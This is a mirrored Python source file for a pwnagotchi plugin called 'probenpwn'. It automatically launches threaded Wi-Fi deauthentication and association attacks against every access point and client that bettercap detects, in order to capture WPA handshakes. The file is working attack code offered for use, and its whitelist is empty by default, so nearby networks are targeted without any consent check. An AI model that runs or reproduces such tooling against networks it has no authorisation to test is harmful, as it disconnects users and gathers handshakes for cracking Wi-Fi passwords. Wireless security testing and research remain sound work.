mirror of
https://github.com/AlienMajik/pwnagotchi_plugins.git
synced 2025-07-01 18:37:27 -04:00
140 lines
5.6 KiB
Python
140 lines
5.6 KiB
Python
![]() |
import logging
|
||
|
import time
|
||
|
import threading
|
||
|
import pwnagotchi.plugins as plugins
|
||
|
|
||
|
class probenpwn(plugins.Plugin):
|
||
|
__author__ = 'AlienMajik'
|
||
|
__version__ = '1.0.0'
|
||
|
__license__ = 'GPL3'
|
||
|
__description__ = 'Pwn more aggressively. Launch immediate associate or deauth attack when bettercap spots a device, with enhanced performance for more handshakes.'
|
||
|
|
||
|
def __init__(self):
|
||
|
logging.debug("ProbeNpwn plugin created")
|
||
|
self._agent = None
|
||
|
self.old_name = None
|
||
|
self.recents = {}
|
||
|
self.whitelist = set()
|
||
|
self.attack_threads = []
|
||
|
self.epoch_duration = 60 # Define a default epoch duration (seconds)
|
||
|
|
||
|
# called before the plugin is unloaded
|
||
|
def on_unload(self, ui):
|
||
|
if self.old_name:
|
||
|
ui.set('name', "%s " % self.old_name)
|
||
|
else:
|
||
|
ui.set('name', "%s> " % ui.get('name')[:-3])
|
||
|
self.old_name = None
|
||
|
logging.info("probing out.")
|
||
|
|
||
|
# called to setup the UI elements
|
||
|
def on_ui_setup(self, ui):
|
||
|
self._ui = ui
|
||
|
|
||
|
def on_ui_update(self, ui):
|
||
|
if self.old_name is None:
|
||
|
self.old_name = ui.get('name')
|
||
|
if self.old_name:
|
||
|
i = self.old_name.find('>')
|
||
|
if i:
|
||
|
ui.set('name', "%s%s" % (self.old_name[:i], "!!!"))
|
||
|
|
||
|
# called when everything is ready and the main loop is about to start
|
||
|
def on_ready(self, agent):
|
||
|
self._agent = agent
|
||
|
logging.info("Probed and Pwnd!")
|
||
|
agent.run("wifi.clear")
|
||
|
if self._ui:
|
||
|
self._ui.set("status", "Probing!\nPWNING THEM GUTS!")
|
||
|
|
||
|
def track_recent(self, ap, cl=None):
|
||
|
ap['_track_time'] = time.time()
|
||
|
self.recents[ap['mac'].lower()] = ap
|
||
|
if cl:
|
||
|
cl['_track_time'] = ap['_track_time']
|
||
|
self.recents[cl['mac'].lower()] = cl
|
||
|
|
||
|
def ok_to_attack(self, ap):
|
||
|
if not self._agent:
|
||
|
return False
|
||
|
if ap['hostname'].lower() in self.whitelist or ap['mac'].lower() in self.whitelist:
|
||
|
return False
|
||
|
return True
|
||
|
|
||
|
def attack_target(self, agent, ap, cl):
|
||
|
if not self.ok_to_attack(ap):
|
||
|
return
|
||
|
logging.debug(f"Launching attack on AP {ap['mac']} and client {cl['mac']}")
|
||
|
# Perform deauth attack
|
||
|
agent.deauth(ap, cl, self.dynamic_attack_delay(ap, cl))
|
||
|
# Perform associate attack
|
||
|
agent.associate(ap, 0.2)
|
||
|
|
||
|
def dynamic_attack_delay(self, ap, cl):
|
||
|
# Adjust attack delay based on client signal strength or network type
|
||
|
if cl.get('signal', -100) < -60:
|
||
|
return 0.5 # Longer delay for weak signals
|
||
|
else:
|
||
|
return 0.25 # Faster attack for stronger signals
|
||
|
|
||
|
def on_bcap_wifi_ap_new(self, agent, event):
|
||
|
try:
|
||
|
ap = event['data']
|
||
|
if agent._config['personality']['associate'] and self.ok_to_attack(ap):
|
||
|
logging.debug("insta-associate: %s (%s)" % (ap['hostname'], ap['mac']))
|
||
|
# Start a thread to handle the attack
|
||
|
attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, None))
|
||
|
attack_thread.start()
|
||
|
self.attack_threads.append(attack_thread)
|
||
|
except Exception as e:
|
||
|
logging.error(f"Error in on_bcap_wifi_ap_new: {repr(e)}")
|
||
|
|
||
|
def on_bcap_wifi_client_new(self, agent, event):
|
||
|
try:
|
||
|
ap = event['data']['AP']
|
||
|
cl = event['data']['Client']
|
||
|
if agent._config['personality']['deauth'] and self.ok_to_attack(ap) and self.ok_to_attack(cl):
|
||
|
logging.debug("insta-deauth: %s (%s)->'%s'(%s)(%s)" % (ap['hostname'], ap['mac'],
|
||
|
cl['hostname'], cl['mac'], cl['vendor']))
|
||
|
# Start a thread for each deauth attack
|
||
|
attack_thread = threading.Thread(target=self.attack_target, args=(agent, ap, cl))
|
||
|
attack_thread.start()
|
||
|
self.attack_threads.append(attack_thread)
|
||
|
except Exception as e:
|
||
|
logging.error(f"Error in on_bcap_wifi_client_new: {repr(e)}")
|
||
|
|
||
|
def on_handshake(self, agent, filename, ap, cl):
|
||
|
logging.info(f"Handshake detected from {ap['mac']}")
|
||
|
if 'mac' in ap and 'mac' in cl:
|
||
|
amac = ap['mac'].lower()
|
||
|
cmac = cl['mac'].lower()
|
||
|
if amac in self.recents:
|
||
|
logging.info(f"Captured handshake from {ap['hostname']} ({ap['mac']}) -> '{cl['hostname']}' ({cl['mac']}) ({cl['vendor']})")
|
||
|
del self.recents[amac]
|
||
|
if cmac in self.recents:
|
||
|
del self.recents[cmac]
|
||
|
|
||
|
def on_epoch(self, agent, epoch, epoch_data):
|
||
|
for mac in list(self.recents):
|
||
|
if self.recents[mac]['_track_time'] < (time.time() - (self.epoch_duration * 2)):
|
||
|
del self.recents[mac]
|
||
|
|
||
|
def on_bcap_wifi_ap_updated(self, agent, event):
|
||
|
try:
|
||
|
ap = event['data']
|
||
|
if self.ok_to_attack(ap):
|
||
|
logging.debug(f"AP updated: {ap['hostname']} ({ap['mac']})")
|
||
|
self.track_recent(ap)
|
||
|
except Exception as e:
|
||
|
logging.error(f"Error in on_bcap_wifi_ap_updated: {repr(e)}")
|
||
|
|
||
|
def on_bcap_wifi_client_updated(self, agent, event):
|
||
|
try:
|
||
|
ap = event['data']['AP']
|
||
|
cl = event['data']['Client']
|
||
|
if self.ok_to_attack(ap) and self.ok_to_attack(cl):
|
||
|
logging.debug(f"Client updated: {ap['hostname']} ({ap['mac']}) -> '{cl['hostname']}' ({cl['mac']}) ({cl['vendor']})")
|
||
|
self.track_recent(ap, cl)
|
||
|
except Exception as e:
|
||
|
logging.error(f"Error in on_bcap_wifi_client_updated: {repr(e)}")
|